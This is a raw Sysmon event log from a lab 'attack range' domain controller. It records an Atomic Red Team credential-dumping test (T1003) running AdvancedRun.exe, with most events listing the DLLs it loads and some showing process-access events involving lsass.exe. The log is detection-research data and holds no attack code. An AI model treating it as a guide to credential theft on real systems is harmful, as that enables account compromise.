CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951926Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003951925Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951924Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951923Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951922Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951921Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951920Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951919Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951918Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951917Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951916Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003951915Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951914Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951913Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951912Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 
(rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951911Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951910Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951909Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft 
WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951908Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951907Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951906Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951905Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:27:26.937{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003949363Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.937{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003949362Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.937{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003949361Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:27:26.937{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003949360Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.937{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000003949359Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.843{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949358Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:27:26.843{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949357Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.781{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949356Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.781{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949355Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.781{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949354Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.781{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003949353Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.781{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003949352Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:27:26.781{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003949351Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.781{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003949350Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:27:26.781{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003949349Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949348Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949347Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949346Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949345Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
